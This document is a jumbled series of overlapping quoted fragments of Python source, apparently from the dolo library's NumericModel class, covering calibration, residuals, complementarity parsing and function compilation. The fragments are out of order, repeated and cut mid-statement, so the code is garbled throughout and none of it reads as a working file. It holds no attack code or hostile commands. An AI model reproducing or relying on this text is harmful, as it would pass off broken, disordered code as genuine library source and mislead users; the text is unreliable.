calib.update(kwargs) self.__update_from_symbolic__() def", "calibration_dict = None covariances = None markov_chain = None def __init__(self, symbolic_model, options=None,", "= 'out' else: target_spec = None if spec.get('complementarities'): # TODO: Rewrite and simplify", "elif isinstance(pname, tuple): return tuple( [ self.get_calibration(p) for p in pname ] )", "'- residuals:\\n' # s += pprint.pformat(compute_residuals(self),indent=2, depth=1) return s def __repr__(self): return self.__str__()", "calib) from .symbolic_eval import NumericEval evaluator = NumericEval(self.calibration_dict) # read symbolic structure self.options", "x_bounds(self): if 'controls_ub' in self.functions: fun_lb = self.functions['controls_lb'] fun_ub = self.functions['controls_ub'] return [fun_lb,", "import residuals return residuals(self, calib) elif self.model_type == 'dtmscc': from dolo.algos.dtmscc.steady_state import residuals", "in self.symbolic.equations: if not spec.get('optional'): raise Exception(\"The model doesn't contain equations of type", "- \"a<=expr\" where a is a controls - \"expr<=a\" where a is a", "# target_short_name = spec.get('target')[2] if spec.get('recursive') is False: target_spec = None else: target_spec[2]", ") from dolo.compiler.misc import CalibrationDict, calibration_to_vector calib = calibration_to_vector(self.symbols, self.calibration_dict) self.calibration = CalibrationDict(self.symbols,", "standard_function(gu_upper_bound, n_output ) original_functions[fb_names[0]] = lower_bound original_functions[fb_names[1]] = upper_bound original_gufunctions[fb_names[0]] = gu_lower_bound original_gufunctions[fb_names[1]]", "original_functions[funname] = fun functions[funname] = standard_function(gufun, n_output ) original_functions[funname] = fun original_gufunctions[funname] =", "# read symbolic structure self.options = evaluator.eval(self.symbolic.options) distribution = evaluator.eval(self.symbolic.distribution) discrete_transition = evaluator.eval(self.symbolic.discrete_transition)", "import pprint # s += '- residuals:\\n' # s += pprint.pformat(compute_residuals(self),indent=2, depth=1) return", ") original_functions[fb_names[0]] = lower_bound original_functions[fb_names[1]] = upper_bound original_gufunctions[fb_names[0]] = gu_lower_bound original_gufunctions[fb_names[1]] = gu_upper_bound", "pname, pvalue = args if isinstance(pname, str): self.set_calibration(**{pname:pvalue}) else: # else ignore pname", "= compile_function_ast(comp_lhs, symbols, comp_args, funname=fb_names[0],definitions=defs) upper_bound, gu_upper_bound = compile_function_ast(comp_rhs, symbols, comp_args, funname=fb_names[1],definitions=defs) n_output", "NumericModel: calibration = None calibration_dict = None covariances = None markov_chain = None", "= ['{}_lb'.format(funname), '{}_ub'.format(funname)] fb_names = ['controls_lb'.format(funname), 'controls_ub'.format(funname)] ddefs = OrderedDict() for ag in", "expr, dataframe=None, calib=None): from dolo.compiler.eval_formula import eval_formula if calib is None: calib =", "not spec.get('optional'): raise Exception(\"The model doesn't contain equations of type '{}'.\".format(funname)) else: continue", "simplify comp_spec = spec.get('complementarities') comp_order = comp_spec['middle'] comp_args = comp_spec['left-right'] comps = []", "ignore pname and pvalue calib = self.symbolic.calibration_dict calib.update(kwargs) self.__update_from_symbolic__() def __str__(self): from dolo.misc.termcolor", "# updates calibration according to the symbolic definitions system = self.symbolic.calibration_dict from dolo.compiler.triangular_solver", "type: \"{type}\" - file: \"{filename}\\n'''.format(**self.infos) ss = '\\n- residuals:\\n\\n' res = self.residuals() #", "def __update_from_symbolic__(self): import numpy # updates calibration according to the symbolic definitions system", "len(args)>0: pnames = (pname,) + args return self.get_calibration(pnames) group = [g for g", "calib = self.symbolic.calibration_dict calib.update(kwargs) self.__update_from_symbolic__() def __str__(self): from dolo.misc.termcolor import colored s =", "residuals(self, calib=None): if self.model_type == 'dtcscc': from dolo.algos.dtcscc.steady_state import residuals return residuals(self, calib)", "return s def __repr__(self): return self.__str__() @property def x_bounds(self): if 'controls_ub' in self.functions:", "= recipe['specs'][funname] if funname not in self.symbolic.equations: if not spec.get('optional'): raise Exception(\"The model", "= gu_upper_bound # rewrite all equations as rhs - lhs def filter_equal(eq): if", "- None - \"a<=expr\" where a is a controls - \"expr<=a\" where a", "self.symbolic.equations.items(): for eqgroup in res.keys(): eqlist = self.symbolic.equations[eqgroup] ss += u\" {}\\n\".format(eqgroup) for", "self.infos = infos if infos is not None else {} self.infos['data_layout'] = 'columns'", "self.symbolic.equations[eqgroup] ss += u\" {}\\n\".format(eqgroup) for i, eq in enumerate(eqlist): val = res[eqgroup][i]", "calib = self.calibration return eval_formula(expr, dataframe=dataframe, context=calib) def __compile_functions__(self): from dolo.compiler.function_compiler_ast import compile_function_ast", "= numpy.atleast_2d(numpy.array(covariances, dtype=float)) markov_chain = discrete_transition if markov_chain is None: self.markov_chain = None", "raise exception if unknown symbol ? if len(args)==2: pname, pvalue = args if", "'dtcscc': from dolo.algos.dtcscc.steady_state import residuals return residuals(self, calib) elif self.model_type == 'dtmscc': from", "= self.symbols[group].index(pname) v = self.calibration[group][i] return v def set_calibration(self, *args, **kwargs): # raise", "in enumerate(eqlist): val = res[eqgroup][i] if abs(val) < 1e-8: val = 0 vals", "if infos is not None else {} self.infos['data_layout'] = 'columns' self.name = self.infos['name']", "ss += \"\\n\" s += ss # import pprint # s += '-", "symbols, comp_args, funname=fb_names[0],definitions=defs) upper_bound, gu_upper_bound = compile_function_ast(comp_rhs, symbols, comp_args, funname=fb_names[1],definitions=defs) n_output = len(comp_lhs)", "dd recipe = recipes[model_type] symbols = self.symbols # should match self.symbols comps =", "= timeshift(rhs, self.variables, time) k = timeshift(lhs, self.variables, time) k = StandardizeDatesSimple(self.variables).visit(k) v", "def residuals(self, calib=None): if self.model_type == 'dtcscc': from dolo.algos.dtcscc.steady_state import residuals return residuals(self,", "dolo.compiler.recipes import recipes from numba import njit class NumericModel: calibration = None calibration_dict", "and pvalue calib = self.symbolic.calibration_dict calib.update(kwargs) self.__update_from_symbolic__() def __str__(self): from dolo.misc.termcolor import colored", "in eqs] target_spec = spec.get('target') n_output = len(self.symbols[target_spec[0]]) # target_short_name = spec.get('target')[2] if", "return [ self.get_calibration(p) for p in pname ] elif isinstance(pname, tuple): return tuple(", "return self.__str__() @property def x_bounds(self): if 'controls_ub' in self.functions: fun_lb = self.functions['controls_lb'] fun_ub", "k = StandardizeDatesSimple(self.variables).visit(k) v = StandardizeDatesSimple(self.variables).visit(tmp) dd[to_source(k)] = to_source(v) auxdefs[time] = dd recipe", "continue if spec.get('target'): # keep only right-hand side # TODO: restore recursive definitions", "None else: target_spec[2] = 'out' else: target_spec = None if spec.get('complementarities'): # TODO:", "def get_calibration(self, pname, *args): if isinstance(pname, list): return [ self.get_calibration(p) for p in", "is None: calib = self.calibration return eval_formula(expr, dataframe=dataframe, context=calib) def __compile_functions__(self): from dolo.compiler.function_compiler_ast", "for r in res] if res[1] != control: msg = \"Complementarity condition '{}'", "= evaluator.eval(self.symbolic.discrete_transition) covariances = distribution if distribution is None: self.covariances = None else:", "from numba import njit class NumericModel: calibration = None calibration_dict = None covariances", "evaluator.eval(self.symbolic.distribution) discrete_transition = evaluator.eval(self.symbolic.discrete_transition) covariances = distribution if distribution is None: self.covariances =", "original_functions = {} original_gufunctions = {} for funname in recipe['specs'].keys(): spec = recipe['specs'][funname]", "in self.symbols.items() if k not in ('parameters','shocks','values')], ()) self.options = options if options", "( {} )'.format(rhs, lhs) eq = str.strip(eq) return eq else: return eq eqs", "self.__update_from_symbolic__() self.__compile_functions__() def __update_from_symbolic__(self): import numpy # updates calibration according to the symbolic", "group[0] except: raise Exception('Unknown symbol {}.'.format(pname)) i = self.symbols[group].index(pname) v = self.calibration[group][i] return", "= '\\n- residuals:\\n\\n' res = self.residuals() # for eqgroup, eqlist in self.symbolic.equations.items(): for", "auxeqs: lhs, rhs = eq.split('=') lhs = ast.parse( str.strip(lhs) ).body[0].value rhs = ast.parse(", "n_output ) functions[fb_names[1]] = standard_function(gu_upper_bound, n_output ) original_functions[fb_names[0]] = lower_bound original_functions[fb_names[1]] = upper_bound", "is not None else {} self.infos = infos if infos is not None", "from .codegen import to_source from .function_compiler_ast import timeshift, StandardizeDatesSimple from dolo.compiler.recipes import recipes", "self.model_spec self.__update_from_symbolic__() self.__compile_functions__() def __update_from_symbolic__(self): import numpy # updates calibration according to the", "import CalibrationDict, calibration_to_vector calib = calibration_to_vector(self.symbols, self.calibration_dict) self.calibration = CalibrationDict(self.symbols, calib) from .symbolic_eval", "for i, eq in enumerate(eqlist): val = res[eqgroup][i] if abs(val) < 1e-8: val", "+= '_' else: # prepare auxiliaries auxeqs = self.symbolic.equations['auxiliary'] auxdefs = {} for", "u''' Model object: ------------ - name: \"{name}\" - type: \"{type}\" - file: \"{filename}\\n'''.format(**self.infos)", "rhs = ast.parse( str.strip(rhs) ).body[0].value tmp = timeshift(rhs, self.variables, time) k = timeshift(lhs,", "to_source(v) auxdefs[time] = dd recipe = recipes[model_type] symbols = self.symbols # should match", "= OrderedDict() for ag in arg_names: if ag[0] == 'auxiliaries': t = ag[1]", "= ast.parse( str.strip(lhs) ).body[0].value rhs = ast.parse( str.strip(rhs) ).body[0].value tmp = timeshift(rhs, self.variables,", "= None if spec.get('complementarities'): # TODO: Rewrite and simplify comp_spec = spec.get('complementarities') comp_order", "= standard_function(gu_upper_bound, n_output ) original_functions[fb_names[0]] = lower_bound original_functions[fb_names[1]] = upper_bound original_gufunctions[fb_names[0]] = gu_lower_bound", "r in res] if res[1] != control: msg = \"Complementarity condition '{}' incorrect.", "fun_lb = self.functions['controls_lb'] fun_ub = self.functions['controls_ub'] return [fun_lb, fun_ub] else: return None def", "= [g for g in self.symbols.keys() if pname in self.symbols[g]] try: group =", "\"{filename}\\n'''.format(**self.infos) ss = '\\n- residuals:\\n\\n' res = self.residuals() # for eqgroup, eqlist in", "= ['controls_lb'.format(funname), 'controls_ub'.format(funname)] ddefs = OrderedDict() for ag in comp_args: if ag[0] ==", "if ag[0] == 'auxiliaries': t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) lower_bound, gu_lower_bound = compile_function_ast(comp_lhs,", "calib.update(kwargs) self.__update_from_symbolic__() def __str__(self): from dolo.misc.termcolor import colored s = u''' Model object:", "original_gufunctions self.functions = functions import re regex = re.compile(\"(.*)<=(.*)<=(.*)\") def decode_complementarity(comp, control): '''", ") functions[fb_names[1]] = standard_function(gu_upper_bound, n_output ) original_functions[fb_names[0]] = lower_bound original_functions[fb_names[1]] = upper_bound original_gufunctions[fb_names[0]]", "symbolic_model self.symbols = symbolic_model.symbols self.variables = sum( [tuple(e) for k,e in self.symbols.items() if", ") # print(\"So far so good !\")c n_output = len(eqs) original_functions[funname] = fun", "self.infos['data_layout'] = 'columns' self.name = self.infos['name'] self.model_type = self.infos['type'] # self.model_spec self.__update_from_symbolic__() self.__compile_functions__()", "gu_lower_bound original_gufunctions[fb_names[1]] = gu_upper_bound # rewrite all equations as rhs - lhs def", "else: self.covariances = numpy.atleast_2d(numpy.array(covariances, dtype=float)) markov_chain = discrete_transition if markov_chain is None: self.markov_chain", "= functions import re regex = re.compile(\"(.*)<=(.*)<=(.*)\") def decode_complementarity(comp, control): ''' # comp", "numpy # updates calibration according to the symbolic definitions system = self.symbolic.calibration_dict from", "s = u''' Model object: ------------ - name: \"{name}\" - type: \"{type}\" -", "eval_formula if calib is None: calib = self.calibration return eval_formula(expr, dataframe=dataframe, context=calib) def", "ast.parse( str.strip(rhs) ).body[0].value tmp = timeshift(rhs, self.variables, time) k = timeshift(lhs, self.variables, time)", "time) k = timeshift(lhs, self.variables, time) k = StandardizeDatesSimple(self.variables).visit(k) v = StandardizeDatesSimple(self.variables).visit(tmp) dd[to_source(k)]", "if spec.get('recursive') is False: target_spec = None else: target_spec[2] = 'out' else: target_spec", "None: self.covariances = None else: self.covariances = numpy.atleast_2d(numpy.array(covariances, dtype=float)) markov_chain = discrete_transition if", ": {vals} : {eqs}\\n\".format(eqn=str(i+1), vals=vals, eqs=eq) ss += \"\\n\" s += ss #", "output_names=target_spec, funname=funname, definitions=ddefs, ) # print(\"So far so good !\")c n_output = len(eqs)", "'_' else: # prepare auxiliaries auxeqs = self.symbolic.equations['auxiliary'] auxdefs = {} for time", "{}.'.format(pname)) i = self.symbols[group].index(pname) v = self.calibration[group][i] return v def set_calibration(self, *args, **kwargs):", "recipe = recipes[model_type] symbols = self.symbols # should match self.symbols comps = []", "\"a<=expr\" where a is a controls - \"expr<=a\" where a is a control", "__compile_functions__(self): from dolo.compiler.function_compiler_ast import compile_function_ast from dolo.compiler.function_compiler import standard_function defs = self.symbolic.definitions #", "= self.symbolic.equations[eqgroup] ss += u\" {}\\n\".format(eqgroup) for i, eq in enumerate(eqlist): val =", "= OrderedDict() for ag in comp_args: if ag[0] == 'auxiliaries': t = ag[1]", "lhs, rhs = str.split(eq,'=') eq = '{} - ( {} )'.format(rhs, lhs) eq", "upper_bound, gu_upper_bound = compile_function_ast(comp_rhs, symbols, comp_args, funname=fb_names[1],definitions=defs) n_output = len(comp_lhs) functions[fb_names[0]] = standard_function(gu_lower_bound,", "definitions eqs = self.symbolic.equations[funname] eqs = [eq.split('=')[1] for eq in eqs] eqs =", "else: return None def residuals(self, calib=None): if self.model_type == 'dtcscc': from dolo.algos.dtcscc.steady_state import", "[g for g in self.symbols.keys() if pname in self.symbols[g]] try: group = group[0]", "self.symbols.items() if k not in ('parameters','shocks','values')], ()) self.options = options if options is", "if options is not None else {} self.infos = infos if infos is", "[fun_lb, fun_ub] else: return None def residuals(self, calib=None): if self.model_type == 'dtcscc': from", "if k not in ('parameters','shocks','values')], ()) self.options = options if options is not", "self.set_calibration(**{pname:pvalue}) else: # else ignore pname and pvalue calib = self.symbolic.calibration_dict calib.update(kwargs) self.__update_from_symbolic__()", "for ag in arg_names: if ag[0] == 'auxiliaries': t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs)", "so good !\")c n_output = len(eqs) original_functions[funname] = fun functions[funname] = standard_function(gufun, n_output", "from .symbolic_eval import NumericEval evaluator = NumericEval(self.calibration_dict) # read symbolic structure self.options =", "infos if infos is not None else {} self.infos['data_layout'] = 'columns' self.name =", "if markov_chain is None: self.markov_chain = None else: self.markov_chain = [numpy.atleast_2d(numpy.array(tab, dtype=float)) for", "control): ''' # comp can be either: - None - \"a<=expr\" where a", "original_functions[funname] = fun original_gufunctions[funname] = gufun self.__original_functions__ = original_functions self.__original_gufunctions__ = original_gufunctions self.functions", "'|' in eq: control = self.symbols[comp_order[0]][i] eq, comp = str.split(eq,'|') lhs, rhs =", "n_output ) original_functions[funname] = fun original_gufunctions[funname] = gufun self.__original_functions__ = original_functions self.__original_gufunctions__ =", "ss # import pprint # s += '- residuals:\\n' # s += pprint.pformat(compute_residuals(self),indent=2,", "eq in eqs] eqs = [str.strip(eq) for eq in eqs] target_spec = spec.get('target')", "self.functions = functions import re regex = re.compile(\"(.*)<=(.*)<=(.*)\") def decode_complementarity(comp, control): ''' #", "res] if res[1] != control: msg = \"Complementarity condition '{}' incorrect. Expected {}", "group = group[0] except: raise Exception('Unknown symbol {}.'.format(pname)) i = self.symbols[group].index(pname) v =", "= self.infos['name'] self.model_type = self.infos['type'] # self.model_spec self.__update_from_symbolic__() self.__compile_functions__() def __update_from_symbolic__(self): import numpy", ") original_functions[funname] = fun original_gufunctions[funname] = gufun self.__original_functions__ = original_functions self.__original_gufunctions__ = original_gufunctions", "self.symbols comps = [] functions = {} original_functions = {} original_gufunctions = {}", "= compile_function_ast(comp_rhs, symbols, comp_args, funname=fb_names[1],definitions=defs) n_output = len(comp_lhs) functions[fb_names[0]] = standard_function(gu_lower_bound, n_output )", "target_spec = spec.get('target') n_output = len(self.symbols[target_spec[0]]) # target_short_name = spec.get('target')[2] if spec.get('recursive') is", ").body[0].value rhs = ast.parse( str.strip(rhs) ).body[0].value tmp = timeshift(rhs, self.variables, time) k =", "msg = \"Complementarity condition '{}' incorrect. Expected {} instead of {}.\".format(comp, control, res[1])", "{eqs}\\n\".format(eqn=str(i+1), vals=vals, eqs=eq) ss += \"\\n\" s += ss # import pprint #", "= calibration_to_vector(self.symbols, self.calibration_dict) self.calibration = CalibrationDict(self.symbols, calib) from .symbolic_eval import NumericEval evaluator =", "if abs(val) < 1e-8: val = 0 vals = '{:.4f}'.format(val) if abs(val) >", "ag in comp_args: if ag[0] == 'auxiliaries': t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) lower_bound,", "= [filter_equal(eq) for eq in eqs] arg_names = recipe['specs'][funname]['eqs'] ddefs = OrderedDict() for", "self.symbols = symbolic_model.symbols self.variables = sum( [tuple(e) for k,e in self.symbols.items() if k", "self.symbolic.calibration_dict from dolo.compiler.triangular_solver import solve_triangular_system self.calibration_dict = solve_triangular_system( system ) from dolo.compiler.misc import", "'columns' self.name = self.infos['name'] self.model_type = self.infos['type'] # self.model_spec self.__update_from_symbolic__() self.__compile_functions__() def __update_from_symbolic__(self):", "in ('parameters','shocks','values')], ()) self.options = options if options is not None else {}", "self.__update_from_symbolic__() def __str__(self): from dolo.misc.termcolor import colored s = u''' Model object: ------------", "'\\n- residuals:\\n\\n' res = self.residuals() # for eqgroup, eqlist in self.symbolic.equations.items(): for eqgroup", "target_spec = None else: target_spec[2] = 'out' else: target_spec = None if spec.get('complementarities'):", "- name: \"{name}\" - type: \"{type}\" - file: \"{filename}\\n'''.format(**self.infos) ss = '\\n- residuals:\\n\\n'", "return None def residuals(self, calib=None): if self.model_type == 'dtcscc': from dolo.algos.dtcscc.steady_state import residuals", "from dolo.compiler.eval_formula import eval_formula if calib is None: calib = self.calibration return eval_formula(expr,", "and simplify comp_spec = spec.get('complementarities') comp_order = comp_spec['middle'] comp_args = comp_spec['left-right'] comps =", "= ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) fun, gufun = compile_function_ast(eqs, symbols, arg_names, output_names=target_spec, funname=funname, definitions=ddefs,", "from dolo.compiler.function_compiler import standard_function defs = self.symbolic.definitions # works for fg models only", "ddefs.update(auxdefs[t]) ddefs.update(defs) fun, gufun = compile_function_ast(eqs, symbols, arg_names, output_names=target_spec, funname=funname, definitions=ddefs, ) #", "= OrderedDict() for eq in auxeqs: lhs, rhs = eq.split('=') lhs = ast.parse(", "residuals return residuals(self, calib) elif self.model_type == 'dtmscc': from dolo.algos.dtmscc.steady_state import residuals return", "system ) from dolo.compiler.misc import CalibrationDict, calibration_to_vector calib = calibration_to_vector(self.symbols, self.calibration_dict) self.calibration =", "if len(args)==2: pname, pvalue = args if isinstance(pname, str): self.set_calibration(**{pname:pvalue}) else: # else", "dolo.compiler.eval_formula import eval_formula if calib is None: calib = self.calibration return eval_formula(expr, dataframe=dataframe,", "structure self.options = evaluator.eval(self.symbolic.options) distribution = evaluator.eval(self.symbolic.distribution) discrete_transition = evaluator.eval(self.symbolic.discrete_transition) covariances = distribution", "from dolo.algos.dtmscc.steady_state import residuals return residuals(self, calib) def eval_formula(self, expr, dataframe=None, calib=None): from", "side # TODO: restore recursive definitions eqs = self.symbolic.equations[funname] eqs = [eq.split('=')[1] for", "*args, **kwargs): # raise exception if unknown symbol ? if len(args)==2: pname, pvalue", "= compile_function_ast(eqs, symbols, arg_names, output_names=target_spec, funname=funname, definitions=ddefs, ) # print(\"So far so good", "()) self.options = options if options is not None else {} self.infos =", "= '{:.4f}'.format(val) if abs(val) > 1e-8: vals = colored(vals, 'red') # eq =", "spec.get('target')[2] if spec.get('recursive') is False: target_spec = None else: target_spec[2] = 'out' else:", "re.compile(\"(.*)<=(.*)<=(.*)\") def decode_complementarity(comp, control): ''' # comp can be either: - None -", "isinstance(pname, tuple): return tuple( [ self.get_calibration(p) for p in pname ] ) elif", "self.functions: fun_lb = self.functions['controls_lb'] fun_ub = self.functions['controls_ub'] return [fun_lb, fun_ub] else: return None", "else: target_spec = None if spec.get('complementarities'): # TODO: Rewrite and simplify comp_spec =", "val = 0 vals = '{:.4f}'.format(val) if abs(val) > 1e-8: vals = colored(vals,", "res = [r.strip() for r in res] if res[1] != control: msg =", "= colored(vals, 'red') # eq = eq.replace('|', u\"\\u27C2\") ss += u\" {eqn:3} :", "= '{} - ( {} )'.format(rhs, lhs) eq = str.strip(eq) return eq else:", "# works for fg models only model_type = self.model_type if 'auxiliaries' not in", "import recipes from numba import njit class NumericModel: calibration = None calibration_dict =", "] ) elif len(args)>0: pnames = (pname,) + args return self.get_calibration(pnames) group =", "'auxiliaries' not in self.symbols: model_type += '_' else: # prepare auxiliaries auxeqs =", "i,eq in enumerate(self.symbolic.equations[funname]): if '|' in eq: control = self.symbols[comp_order[0]][i] eq, comp =", "= u''' Model object: ------------ - name: \"{name}\" - type: \"{type}\" - file:", "'{}'.\".format(funname)) else: continue if spec.get('target'): # keep only right-hand side # TODO: restore", "= lower_bound original_functions[fb_names[1]] = upper_bound original_gufunctions[fb_names[0]] = gu_lower_bound original_gufunctions[fb_names[1]] = gu_upper_bound # rewrite", "@property def x_bounds(self): if 'controls_ub' in self.functions: fun_lb = self.functions['controls_lb'] fun_ub = self.functions['controls_ub']", "len(args)==2: pname, pvalue = args if isinstance(pname, str): self.set_calibration(**{pname:pvalue}) else: # else ignore", "dd = OrderedDict() for eq in auxeqs: lhs, rhs = eq.split('=') lhs =", "if pname in self.symbols[g]] try: group = group[0] except: raise Exception('Unknown symbol {}.'.format(pname))", "for ag in comp_args: if ag[0] == 'auxiliaries': t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs)", "None def residuals(self, calib=None): if self.model_type == 'dtcscc': from dolo.algos.dtcscc.steady_state import residuals return", "+ args return self.get_calibration(pnames) group = [g for g in self.symbols.keys() if pname", "if isinstance(pname, list): return [ self.get_calibration(p) for p in pname ] elif isinstance(pname,", "if unknown symbol ? if len(args)==2: pname, pvalue = args if isinstance(pname, str):", "'auxiliaries': t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) lower_bound, gu_lower_bound = compile_function_ast(comp_lhs, symbols, comp_args, funname=fb_names[0],definitions=defs)", "self.options = evaluator.eval(self.symbolic.options) distribution = evaluator.eval(self.symbolic.distribution) discrete_transition = evaluator.eval(self.symbolic.discrete_transition) covariances = distribution if", "= options if options is not None else {} self.infos = infos if", "elif len(args)>0: pnames = (pname,) + args return self.get_calibration(pnames) group = [g for", "self.symbols: model_type += '_' else: # prepare auxiliaries auxeqs = self.symbolic.equations['auxiliary'] auxdefs =", "read symbolic structure self.options = evaluator.eval(self.symbolic.options) distribution = evaluator.eval(self.symbolic.distribution) discrete_transition = evaluator.eval(self.symbolic.discrete_transition) covariances", "self.variables, time) k = StandardizeDatesSimple(self.variables).visit(k) v = StandardizeDatesSimple(self.variables).visit(tmp) dd[to_source(k)] = to_source(v) auxdefs[time] =", "u\"\\u27C2\") ss += u\" {eqn:3} : {vals} : {eqs}\\n\".format(eqn=str(i+1), vals=vals, eqs=eq) ss +=", "eqgroup in res.keys(): eqlist = self.symbolic.equations[eqgroup] ss += u\" {}\\n\".format(eqgroup) for i, eq", "def x_bounds(self): if 'controls_ub' in self.functions: fun_lb = self.functions['controls_lb'] fun_ub = self.functions['controls_ub'] return", "timeshift, StandardizeDatesSimple from dolo.compiler.recipes import recipes from numba import njit class NumericModel: calibration", "options if options is not None else {} self.infos = infos if infos", "return eq else: return eq eqs = [filter_equal(eq) for eq in eqs] arg_names", "= [r.strip() for r in res] if res[1] != control: msg = \"Complementarity", "dolo.compiler.misc import CalibrationDict, calibration_to_vector calib = calibration_to_vector(self.symbols, self.calibration_dict) self.calibration = CalibrationDict(self.symbols, calib) from", "self.model_type == 'dtcscc': from dolo.algos.dtcscc.steady_state import residuals return residuals(self, calib) elif self.model_type ==", "= symbolic_model.symbols self.variables = sum( [tuple(e) for k,e in self.symbols.items() if k not", "compile_function_ast from dolo.compiler.function_compiler import standard_function defs = self.symbolic.definitions # works for fg models", "ddefs.update(auxdefs[t]) ddefs.update(defs) lower_bound, gu_lower_bound = compile_function_ast(comp_lhs, symbols, comp_args, funname=fb_names[0],definitions=defs) upper_bound, gu_upper_bound = compile_function_ast(comp_rhs,", "distribution = evaluator.eval(self.symbolic.distribution) discrete_transition = evaluator.eval(self.symbolic.discrete_transition) covariances = distribution if distribution is None:", "s += '- residuals:\\n' # s += pprint.pformat(compute_residuals(self),indent=2, depth=1) return s def __repr__(self):", "['controls_lb'.format(funname), 'controls_ub'.format(funname)] ddefs = OrderedDict() for ag in comp_args: if ag[0] == 'auxiliaries':", "len(self.symbols[target_spec[0]]) # target_short_name = spec.get('target')[2] if spec.get('recursive') is False: target_spec = None else:", "= str.strip(eq) return eq else: return eq eqs = [filter_equal(eq) for eq in", "only right-hand side # TODO: restore recursive definitions eqs = self.symbolic.equations[funname] eqs =", "file: \"{filename}\\n'''.format(**self.infos) ss = '\\n- residuals:\\n\\n' res = self.residuals() # for eqgroup, eqlist", "= self.calibration return eval_formula(expr, dataframe=dataframe, context=calib) def __compile_functions__(self): from dolo.compiler.function_compiler_ast import compile_function_ast from", "= spec.get('target') n_output = len(self.symbols[target_spec[0]]) # target_short_name = spec.get('target')[2] if spec.get('recursive') is False:", "self.functions['controls_lb'] fun_ub = self.functions['controls_ub'] return [fun_lb, fun_ub] else: return None def residuals(self, calib=None):", "in pname ] ) elif len(args)>0: pnames = (pname,) + args return self.get_calibration(pnames)", "= solve_triangular_system( system ) from dolo.compiler.misc import CalibrationDict, calibration_to_vector calib = calibration_to_vector(self.symbols, self.calibration_dict)", "functions = {} original_functions = {} original_gufunctions = {} for funname in recipe['specs'].keys():", "spec.get('optional'): raise Exception(\"The model doesn't contain equations of type '{}'.\".format(funname)) else: continue if", "dataframe=None, calib=None): from dolo.compiler.eval_formula import eval_formula if calib is None: calib = self.calibration", "contain equations of type '{}'.\".format(funname)) else: continue if spec.get('target'): # keep only right-hand", "g in self.symbols.keys() if pname in self.symbols[g]] try: group = group[0] except: raise", "__init__(self, symbolic_model, options=None, infos=None): self.symbolic = symbolic_model self.symbols = symbolic_model.symbols self.variables = sum(", "auxdefs = {} for time in [-1,0,1]: dd = OrderedDict() for eq in", "can be either: - None - \"a<=expr\" where a is a controls -", "updates calibration according to the symbolic definitions system = self.symbolic.calibration_dict from dolo.compiler.triangular_solver import", "calib is None: calib = self.calibration return eval_formula(expr, dataframe=dataframe, context=calib) def __compile_functions__(self): from", "comps.append([lhs, rhs]) else: comps.append(['-inf', 'inf']) eqs.append(eq) comp_lhs, comp_rhs = zip(*comps) # fb_names =", "else {} self.infos['data_layout'] = 'columns' self.name = self.infos['name'] self.model_type = self.infos['type'] # self.model_spec", "eqs = [filter_equal(eq) for eq in eqs] arg_names = recipe['specs'][funname]['eqs'] ddefs = OrderedDict()", "regex = re.compile(\"(.*)<=(.*)<=(.*)\") def decode_complementarity(comp, control): ''' # comp can be either: -", "lower_bound, gu_lower_bound = compile_function_ast(comp_lhs, symbols, comp_args, funname=fb_names[0],definitions=defs) upper_bound, gu_upper_bound = compile_function_ast(comp_rhs, symbols, comp_args,", "len(eqs) original_functions[funname] = fun functions[funname] = standard_function(gufun, n_output ) original_functions[funname] = fun original_gufunctions[funname]", "= self.functions['controls_lb'] fun_ub = self.functions['controls_ub'] return [fun_lb, fun_ub] else: return None def residuals(self,", "'{} - ( {} )'.format(rhs, lhs) eq = str.strip(eq) return eq else: return", "functions[fb_names[0]] = standard_function(gu_lower_bound, n_output ) functions[fb_names[1]] = standard_function(gu_upper_bound, n_output ) original_functions[fb_names[0]] = lower_bound", "for eqgroup in res.keys(): eqlist = self.symbolic.equations[eqgroup] ss += u\" {}\\n\".format(eqgroup) for i,", "comps.append(['-inf', 'inf']) eqs.append(eq) comp_lhs, comp_rhs = zip(*comps) # fb_names = ['{}_lb'.format(funname), '{}_ub'.format(funname)] fb_names", "\"{type}\" - file: \"{filename}\\n'''.format(**self.infos) ss = '\\n- residuals:\\n\\n' res = self.residuals() # for", "dolo.algos.dtmscc.steady_state import residuals return residuals(self, calib) def eval_formula(self, expr, dataframe=None, calib=None): from dolo.compiler.eval_formula", "lhs, rhs = decode_complementarity(comp, control) comps.append([lhs, rhs]) else: comps.append(['-inf', 'inf']) eqs.append(eq) comp_lhs, comp_rhs", "from dolo.algos.dtcscc.steady_state import residuals return residuals(self, calib) elif self.model_type == 'dtmscc': from dolo.algos.dtmscc.steady_state", "comp_args, funname=fb_names[1],definitions=defs) n_output = len(comp_lhs) functions[fb_names[0]] = standard_function(gu_lower_bound, n_output ) functions[fb_names[1]] = standard_function(gu_upper_bound,", "OrderedDict() for ag in arg_names: if ag[0] == 'auxiliaries': t = ag[1] ddefs.update(auxdefs[t])", "res[eqgroup][i] if abs(val) < 1e-8: val = 0 vals = '{:.4f}'.format(val) if abs(val)", "prepare auxiliaries auxeqs = self.symbolic.equations['auxiliary'] auxdefs = {} for time in [-1,0,1]: dd", "controls - \"expr<=a\" where a is a control - \"expr1<=a<=expr2\" ''' try: res", "lhs) eq = str.strip(eq) return eq else: return eq eqs = [filter_equal(eq) for", "= re.compile(\"(.*)<=(.*)<=(.*)\") def decode_complementarity(comp, control): ''' # comp can be either: - None", "calib=None): from dolo.compiler.eval_formula import eval_formula if calib is None: calib = self.calibration return", "n_output = len(eqs) original_functions[funname] = fun functions[funname] = standard_function(gufun, n_output ) original_functions[funname] =", "Exception(\"Unable to parse complementarity condition '{}'\".format(comp)) res = [r.strip() for r in res]", "= None else: target_spec[2] = 'out' else: target_spec = None if spec.get('complementarities'): #", "dtype=float)) markov_chain = discrete_transition if markov_chain is None: self.markov_chain = None else: self.markov_chain", "for g in self.symbols.keys() if pname in self.symbols[g]] try: group = group[0] except:", "- file: \"{filename}\\n'''.format(**self.infos) ss = '\\n- residuals:\\n\\n' res = self.residuals() # for eqgroup,", "'{}'\".format(comp)) res = [r.strip() for r in res] if res[1] != control: msg", "in res] if res[1] != control: msg = \"Complementarity condition '{}' incorrect. Expected", "self.symbolic.equations[funname] eqs = [eq.split('=')[1] for eq in eqs] eqs = [str.strip(eq) for eq", "# import pprint # s += '- residuals:\\n' # s += pprint.pformat(compute_residuals(self),indent=2, 